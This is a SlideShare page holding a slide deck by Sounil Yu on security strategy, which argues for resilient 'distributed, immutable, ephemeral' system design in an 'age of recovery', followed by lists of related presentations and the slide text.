SlideShare a Scribd company logo
How To Solve Cybersecurity
New Paradigms for the Next Era of Security
Sounil Yu
@sounilyu
The Grand Challenge of Our Generation
@sounilyu 2
What should we focus on if we want
to solve it within the next few years?
Solved State: Get Inside the Attacker OODA Loop?
@sounilyu 3
Orient
DecideAct
Observe
Defender OODA Loop
Attacker OODA LoopObserve
OrientDecide
Act
Can defenders ever achieve the goal
of responding faster than the
attacker?
A Quick History of IT and Security
@sounilyu 4
1980s 1990s 2000s 2010s
Core
Challenges
Solutions
IT / Security
Tension
Asset Inventory,
Asset Mgt, Asset
Prioritization
Viruses, Insecure
Configs, Server-
side Attacks
Client-side
Attacks, Log
Analysis and Mgt
Assume Breach,
Too Many
Privileges
Systems Mgt
Tools, Scanners
A/V, Firewalls,
Secure Configs,
App Sec
IDS, SIEM Incident Response,
Hunting, EDR, IdAM
Era
Security Team
Composition
& Focus
None
Hobby Shop /
Vulnerability Mgt
Dedicated Biz
Unit / Risk Mgt
Sec Ops Center /
Threat Mgt
STABILITY
(CIO)
SECURITY
(CISO)
Mapping to the NIST Cyber Security Framework
@sounilyu 5
1980s 1990s 2000s 2010s
Core
Challenges
Solutions
IT / Security
Tension
Asset Inventory,
Asset Mgt, Asset
Prioritization
Viruses, Insecure
Configs, Server-
side Attacks
Client-side
Attacks, Log
Analysis and Mgt
Assume Breach,
Too Many
Privileges
Systems Mgt
Tools, Scanners
A/V, Firewalls,
Secure Configs,
App Sec
IDS, SIEM Incident Response,
Hunting, EDR, IdAM
Era
Security Team
Composition
& Focus
None
Hobby Shop /
Vulnerability Mgt
Dedicated Biz
Unit / Risk Mgt
Sec Ops Center /
Threat Mgt
STABILITY
(CIO)
SECURITY
(CISO)
2020s: Age of Recovery (or Resiliency)
@sounilyu 6
What kind of attacks should we see in the 2020s
that would challenge to our ability to RECOVER
or cause irreversible harm?
Wikileaks
Doxxing
Ransomware
#fakenews
PDoS, MBR Wiper,
Bricking Firmware
Confidentiality Integrity Availability
2020s: Age of Recovery (or Resiliency)
@sounilyu 7
What kind of solutions directly support
our ability to RECOVER or be RESILIENT?
JOIN THE PREVENTION AGE
STOP CYBER BREACHES
Forging ahead or regressing back?
@sounilyu 8
• A call to go back to the 1990s?
• How will prevention mitigate the
impact of ransomware?
- Remember, we learned “assume
breach” in the 2010s
- Prevention minimizes the
occurrences, but does not address
the impact or ability to recoverJOIN THE PREVENTION AGE
STOP CYBER BREACHES
2020s: Age of Recovery (or Resiliency)
@sounilyu 9
What kind of solutions directly support
our ability to RECOVER or be RESILIENT?
Copy on Write
Computer
Hypervisor OS
Apps Apps Apps
Libraries
SERVERLESS ARCHITECTURE
Content Delivery Network
But wait! How are these “security” solutions?
10
Distributed Immutable Ephemeral
DDoS
Resistant
The best solution against a
distributed attack is a
distributed service
Changes Easier to
Detect and Reverse
Unauthorized changes
stand out and can be
reverted to known good
Drives Value of
Assets Closer to Zero
Makes attacker persistence
hard and reduces concern
for assets at risk
Availability Integrity Confidentiality
@sounilyu
The Alternative:
An Endless Conveyor Belt of Vulnerabilities and Threats
@sounilyu 11
Risk
Never Ending Threats
Never Ending Vulns
Likelihood Impact= x
Pets vs Cattle
@sounilyu 12
• Given a familiar name
• Taken to the vet when sick
• Hugged
• Branded with an obscure,
unpronounceable name
• Shot when sick
• Eaten/Recycled (sorry PETA)
A New Measurement for a New Era: Pets vs Cattle Curve
@sounilyu 13
10000
0 5000 10000 15000 20000
1000
100
10
1
@40 Days  Pets = 2.5%
@10 Days  Pets = 10%
Target: @ 10 Days  Pets = 2.5%
Fewer
pets
Find design patterns,
policies, and incentives
that push the curve in
these directions
Shorter-
lived
cattle
Uptime(inDays)
SystemsPets
Cattle
2000systems
10 days
500systems
40 days
A Better Way to Get Inside the Attacker OODA Loop?
@sounilyu 14
Orient
DecideAct
Observe
Defender OODA Loop
Attacker OODA Loop
Observe
OrientDecide
Act
Act
ObserveOrient
Decide
Natural Business OODA Loop
Business OODA Loop
w/Traditional Security Restrictions
Distributed, immutable, and ephemeral design
patterns allow businesses to move faster and
naturally shorten the OODA loop
(OODABusiness – OODACIO+CISO = Shadow IT)
Larger swaths of risk are quickly being eliminated at newer companies, at
earlier and earlier stages. And usually not because security was the goal.
– Ryan McGeehan https://medium.com/starting-up-security/you-dont-need-a-chief-security-officer-3f8d1a76b924
None
Hobby Shop /
Vulnerability
Mgt
Dedicated Biz
Unit / Risk Mgt
Sec Ops Center /
Threat Mgt
Completing the NIST Cyber Security Framework
@sounilyu 15
Asset Inventory,
Asset Mgt, Asset
Prioritization
Viruses, Insecure
Configs, Server-
side Attacks
Client-side
Attacks, Log
Analysis and Mgt
Assume Breach,
Too Many
Privileges
STABILITY
(CIO)
Systems Mgt
Tools, Scanners
A/V, Firewalls,
Secure Configs,
App Sec
IDS, SIEM
Incident
Response,
Hunting, EDR,
IdAM
SECURITY
(CISO)
1980
Identify
1990
Protect
2000
Detect
2010
Respond
2020
Recover
Ransomware,
MBR Wiper,
DDoS, Firmware
Bricking
Distributed,
Immutable,
Ephemeral
(DIE!!!) Systems
Integrated Team /
Rugged DevOps
Core
Challenges
Solutions
IT / Security
Tension
Era
Security Team
Composition
& Focus
• Known attack methods only get better with time against static systems
• The next era in IT and Security will manifest more irreversible attacks
that challenge and undermine our ability to RECOVER
• Better PROTECT, DETECT, and RESPOND capabilities may reduce
occurrences of malicious events but are insufficient against well-
executed destructive/irreversible scenarios
• Our best countermeasure is resilient design patterns that promote the
qualities of distributed, immutable, and ephemeral (DIE!) in lieu of
confidentiality, integrity, and availability
Summary
@sounilyu 16
• Elimination of poor designs will happen either by intentional
decommissioning or by destruction. Which would you rather
count on?
Solving Cybersecurity Through Cyber Train Crashes
@sounilyu 17

More Related Content

What's hot

cyber-security-reference-architecture
cyber-security-reference-architecturecyber-security-reference-architecture
cyber-security-reference-architecture
Birendra Negi ☁️
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligence
Prachi Mishra
 
An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)
Ahmad Haghighi
 
Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)
Sqrrl
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
Digit Oktavianto
 
Security operations center-SOC Presentation-مرکز عملیات امنیت
Security operations center-SOC Presentation-مرکز عملیات امنیتSecurity operations center-SOC Presentation-مرکز عملیات امنیت
Security operations center-SOC Presentation-مرکز عملیات امنیت
ReZa AdineH
 
Threat Intelligence 101 - Steve Lodin - Submitted
Threat Intelligence 101 - Steve Lodin - SubmittedThreat Intelligence 101 - Steve Lodin - Submitted
Threat Intelligence 101 - Steve Lodin - Submitted
Steve Lodin
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligence
seadeloitte
 
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond AlertingProactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
CrowdStrike
 
Patch and Vulnerability Management
Patch and Vulnerability ManagementPatch and Vulnerability Management
Patch and Vulnerability Management
Marcelo Martins
 
From SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity ChasmFrom SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity Chasm
Priyanka Aash
 
NIST cybersecurity framework
NIST cybersecurity frameworkNIST cybersecurity framework
NIST cybersecurity framework
Shriya Rai
 
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Edureka!
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
Splunk
 
SOC presentation- Building a Security Operations Center
SOC presentation- Building a Security Operations CenterSOC presentation- Building a Security Operations Center
SOC presentation- Building a Security Operations Center
Michael Nickle
 
CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)
CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)
CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)
WAJAHAT IQBAL
 
Enterprise Security Architecture for Cyber Security
Enterprise Security Architecture for Cyber SecurityEnterprise Security Architecture for Cyber Security
Enterprise Security Architecture for Cyber Security
The Open Group SA
 
PaloAlto Enterprise Security Solution
PaloAlto Enterprise Security SolutionPaloAlto Enterprise Security Solution
PaloAlto Enterprise Security Solution
Prime Infoserv
 
7 Steps to Build a SOC with Limited Resources
7 Steps to Build a SOC with Limited Resources7 Steps to Build a SOC with Limited Resources
7 Steps to Build a SOC with Limited Resources
LogRhythm
 
Security operation center (SOC)
Security operation center (SOC)Security operation center (SOC)
Security operation center (SOC)
Ahmed Ayman
 

What's hot (20)

cyber-security-reference-architecture
cyber-security-reference-architecturecyber-security-reference-architecture
cyber-security-reference-architecture
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligence
 
An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)
 
Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
 
Security operations center-SOC Presentation-مرکز عملیات امنیت
Security operations center-SOC Presentation-مرکز عملیات امنیتSecurity operations center-SOC Presentation-مرکز عملیات امنیت
Security operations center-SOC Presentation-مرکز عملیات امنیت
 
Threat Intelligence 101 - Steve Lodin - Submitted
Threat Intelligence 101 - Steve Lodin - SubmittedThreat Intelligence 101 - Steve Lodin - Submitted
Threat Intelligence 101 - Steve Lodin - Submitted
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligence
 
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond AlertingProactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
 
Patch and Vulnerability Management
Patch and Vulnerability ManagementPatch and Vulnerability Management
Patch and Vulnerability Management
 
From SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity ChasmFrom SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity Chasm
 
NIST cybersecurity framework
NIST cybersecurity frameworkNIST cybersecurity framework
NIST cybersecurity framework
 
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
Cybersecurity Frameworks | NIST Cybersecurity Framework | Cybersecurity Certi...
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
SOC presentation- Building a Security Operations Center
SOC presentation- Building a Security Operations CenterSOC presentation- Building a Security Operations Center
SOC presentation- Building a Security Operations Center
 
CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)
CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)
CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)
 
Enterprise Security Architecture for Cyber Security
Enterprise Security Architecture for Cyber SecurityEnterprise Security Architecture for Cyber Security
Enterprise Security Architecture for Cyber Security
 
PaloAlto Enterprise Security Solution
PaloAlto Enterprise Security SolutionPaloAlto Enterprise Security Solution
PaloAlto Enterprise Security Solution
 
7 Steps to Build a SOC with Limited Resources
7 Steps to Build a SOC with Limited Resources7 Steps to Build a SOC with Limited Resources
7 Steps to Build a SOC with Limited Resources
 
Security operation center (SOC)
Security operation center (SOC)Security operation center (SOC)
Security operation center (SOC)
 

Similar to Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security

Challenges2013
Challenges2013Challenges2013
Challenges2013
Lancope, Inc.
 
APT Monitoring and Compliance
APT Monitoring and ComplianceAPT Monitoring and Compliance
APT Monitoring and Compliance
Marcus Clarke
 
Introduction to Cyber Security
Introduction to Cyber SecurityIntroduction to Cyber Security
Introduction to Cyber Security
Stephen Lahanas
 
Netwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech TalkNetwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech Talk
NetWatcher
 
The CISO Problems Risk Compliance Management in a Software Development 030420...
The CISO Problems Risk Compliance Management in a Software Development 030420...The CISO Problems Risk Compliance Management in a Software Development 030420...
The CISO Problems Risk Compliance Management in a Software Development 030420...
lior mazor
 
How BlueHat Cyber Uses SanerNow to Automate Patch Management and Beyond
How BlueHat Cyber Uses SanerNow to Automate Patch Management and BeyondHow BlueHat Cyber Uses SanerNow to Automate Patch Management and Beyond
How BlueHat Cyber Uses SanerNow to Automate Patch Management and Beyond
SecPod Technologies
 
Security Opportunities A Silicon Valley VC Perspective
Security Opportunities  A Silicon Valley VC PerspectiveSecurity Opportunities  A Silicon Valley VC Perspective
Security Opportunities A Silicon Valley VC Perspective
Positive Hack Days
 
White Hat 6 March 2015 v2.2
White Hat 6 March 2015 v2.2White Hat 6 March 2015 v2.2
White hat march15 v2.2
White hat march15 v2.2White hat march15 v2.2
Carbon Black: Keys to Shutting Down Attacks
Carbon Black: Keys to Shutting Down AttacksCarbon Black: Keys to Shutting Down Attacks
Carbon Black: Keys to Shutting Down Attacks
Mighty Guides, Inc.
 
Reading the Security Tea Leaves
Reading the Security Tea LeavesReading the Security Tea Leaves
Reading the Security Tea Leaves
Ed Bellis
 
The Avoidable Risks of Remote Working
The Avoidable Risks of Remote WorkingThe Avoidable Risks of Remote Working
The Avoidable Risks of Remote Working
Richard Kennedy
 
Mobility Security - A Business-Centric Approach
Mobility Security - A Business-Centric ApproachMobility Security - A Business-Centric Approach
Mobility Security - A Business-Centric Approach
Omar Khawaja
 
Elastic Security: Your one-stop OODA loop shop
Elastic Security: Your one-stop OODA loop shopElastic Security: Your one-stop OODA loop shop
Elastic Security: Your one-stop OODA loop shop
Elasticsearch
 
Securing Systems - Still Crazy After All These Years
Securing Systems - Still Crazy After All These YearsSecuring Systems - Still Crazy After All These Years
Securing Systems - Still Crazy After All These Years
Adrian Sanabria
 
Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...
Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...
Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...
Symantec
 
Application security meetup 27012021
Application security meetup 27012021Application security meetup 27012021
Application security meetup 27012021
lior mazor
 
Time based security for cloud computing
Time based security for cloud computingTime based security for cloud computing
Time based security for cloud computing
Jorge Sebastiao
 
World of Watson 2016 - Information Insecurity
World of Watson 2016 - Information InsecurityWorld of Watson 2016 - Information Insecurity
World of Watson 2016 - Information Insecurity
Keith Redman
 
vip_day_2._1130_cloud
vip_day_2._1130_cloudvip_day_2._1130_cloud
vip_day_2._1130_cloud
Nicholas Chia
 

Similar to Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security (20)

Challenges2013
Challenges2013Challenges2013
Challenges2013
 
APT Monitoring and Compliance
APT Monitoring and ComplianceAPT Monitoring and Compliance
APT Monitoring and Compliance
 
Introduction to Cyber Security
Introduction to Cyber SecurityIntroduction to Cyber Security
Introduction to Cyber Security
 
Netwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech TalkNetwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech Talk
 
The CISO Problems Risk Compliance Management in a Software Development 030420...
The CISO Problems Risk Compliance Management in a Software Development 030420...The CISO Problems Risk Compliance Management in a Software Development 030420...
The CISO Problems Risk Compliance Management in a Software Development 030420...
 
How BlueHat Cyber Uses SanerNow to Automate Patch Management and Beyond
How BlueHat Cyber Uses SanerNow to Automate Patch Management and BeyondHow BlueHat Cyber Uses SanerNow to Automate Patch Management and Beyond
How BlueHat Cyber Uses SanerNow to Automate Patch Management and Beyond
 
Security Opportunities A Silicon Valley VC Perspective
Security Opportunities  A Silicon Valley VC PerspectiveSecurity Opportunities  A Silicon Valley VC Perspective
Security Opportunities A Silicon Valley VC Perspective
 
White Hat 6 March 2015 v2.2
White Hat 6 March 2015 v2.2White Hat 6 March 2015 v2.2
White Hat 6 March 2015 v2.2
 
White hat march15 v2.2
White hat march15 v2.2White hat march15 v2.2
White hat march15 v2.2
 
Carbon Black: Keys to Shutting Down Attacks
Carbon Black: Keys to Shutting Down AttacksCarbon Black: Keys to Shutting Down Attacks
Carbon Black: Keys to Shutting Down Attacks
 
Reading the Security Tea Leaves
Reading the Security Tea LeavesReading the Security Tea Leaves
Reading the Security Tea Leaves
 
The Avoidable Risks of Remote Working
The Avoidable Risks of Remote WorkingThe Avoidable Risks of Remote Working
The Avoidable Risks of Remote Working
 
Mobility Security - A Business-Centric Approach
Mobility Security - A Business-Centric ApproachMobility Security - A Business-Centric Approach
Mobility Security - A Business-Centric Approach
 
Elastic Security: Your one-stop OODA loop shop
Elastic Security: Your one-stop OODA loop shopElastic Security: Your one-stop OODA loop shop
Elastic Security: Your one-stop OODA loop shop
 
Securing Systems - Still Crazy After All These Years
Securing Systems - Still Crazy After All These YearsSecuring Systems - Still Crazy After All These Years
Securing Systems - Still Crazy After All These Years
 
Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...
Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...
Symantec Webinar | Redefining Endpoint Security- How to Better Secure the End...
 
Application security meetup 27012021
Application security meetup 27012021Application security meetup 27012021
Application security meetup 27012021
 
Time based security for cloud computing
Time based security for cloud computingTime based security for cloud computing
Time based security for cloud computing
 
World of Watson 2016 - Information Insecurity
World of Watson 2016 - Information InsecurityWorld of Watson 2016 - Information Insecurity
World of Watson 2016 - Information Insecurity
 
vip_day_2._1130_cloud
vip_day_2._1130_cloudvip_day_2._1130_cloud
vip_day_2._1130_cloud
 

Recently uploaded

Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
Jakub Marek
 
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-EfficiencyFreshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
ScyllaDB
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
Fwdays
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
christinelarrosa
 
AppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSFAppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSF
Ajin Abraham
 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
Javier Junquera
 
High performance Serverless Java on AWS- GoTo Amsterdam 2024
High performance Serverless Java on AWS- GoTo Amsterdam 2024High performance Serverless Java on AWS- GoTo Amsterdam 2024
High performance Serverless Java on AWS- GoTo Amsterdam 2024
Vadym Kazulkin
 
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge GraphGraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
Neo4j
 
JavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green MasterplanJavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green Masterplan
Miro Wengner
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
Fwdays
 
"What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w..."What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w...
Fwdays
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
Neo4j
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
LizaNolte
 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
DanBrown980551
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Antonios Katsarakis
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
AstuteBusiness
 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
Safe Software
 
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
Edge AI and Vision Alliance
 
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving
 
Christine's Product Research Presentation.pptx
Christine's Product Research Presentation.pptxChristine's Product Research Presentation.pptx
Christine's Product Research Presentation.pptx
christinelarrosa
 

Recently uploaded (20)

Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
 
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-EfficiencyFreshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
 
AppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSFAppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSF
 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
 
High performance Serverless Java on AWS- GoTo Amsterdam 2024
High performance Serverless Java on AWS- GoTo Amsterdam 2024High performance Serverless Java on AWS- GoTo Amsterdam 2024
High performance Serverless Java on AWS- GoTo Amsterdam 2024
 
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge GraphGraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
 
JavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green MasterplanJavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green Masterplan
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
 
"What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w..."What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w...
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
 
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
“Temporal Event Neural Networks: A More Efficient Alternative to the Transfor...
 
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
 
Christine's Product Research Presentation.pptx
Christine's Product Research Presentation.pptxChristine's Product Research Presentation.pptx
Christine's Product Research Presentation.pptx
 

Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security

  • 1. How To Solve Cybersecurity New Paradigms for the Next Era of Security Sounil Yu @sounilyu
  • 2. The Grand Challenge of Our Generation @sounilyu 2 What should we focus on if we want to solve it within the next few years?
  • 3. Solved State: Get Inside the Attacker OODA Loop? @sounilyu 3 Orient DecideAct Observe Defender OODA Loop Attacker OODA LoopObserve OrientDecide Act Can defenders ever achieve the goal of responding faster than the attacker?
  • 4. A Quick History of IT and Security @sounilyu 4 1980s 1990s 2000s 2010s Core Challenges Solutions IT / Security Tension Asset Inventory, Asset Mgt, Asset Prioritization Viruses, Insecure Configs, Server- side Attacks Client-side Attacks, Log Analysis and Mgt Assume Breach, Too Many Privileges Systems Mgt Tools, Scanners A/V, Firewalls, Secure Configs, App Sec IDS, SIEM Incident Response, Hunting, EDR, IdAM Era Security Team Composition & Focus None Hobby Shop / Vulnerability Mgt Dedicated Biz Unit / Risk Mgt Sec Ops Center / Threat Mgt STABILITY (CIO) SECURITY (CISO)
  • 5. Mapping to the NIST Cyber Security Framework @sounilyu 5 1980s 1990s 2000s 2010s Core Challenges Solutions IT / Security Tension Asset Inventory, Asset Mgt, Asset Prioritization Viruses, Insecure Configs, Server- side Attacks Client-side Attacks, Log Analysis and Mgt Assume Breach, Too Many Privileges Systems Mgt Tools, Scanners A/V, Firewalls, Secure Configs, App Sec IDS, SIEM Incident Response, Hunting, EDR, IdAM Era Security Team Composition & Focus None Hobby Shop / Vulnerability Mgt Dedicated Biz Unit / Risk Mgt Sec Ops Center / Threat Mgt STABILITY (CIO) SECURITY (CISO)
  • 6. 2020s: Age of Recovery (or Resiliency) @sounilyu 6 What kind of attacks should we see in the 2020s that would challenge to our ability to RECOVER or cause irreversible harm? Wikileaks Doxxing Ransomware #fakenews PDoS, MBR Wiper, Bricking Firmware Confidentiality Integrity Availability
  • 7. 2020s: Age of Recovery (or Resiliency) @sounilyu 7 What kind of solutions directly support our ability to RECOVER or be RESILIENT?
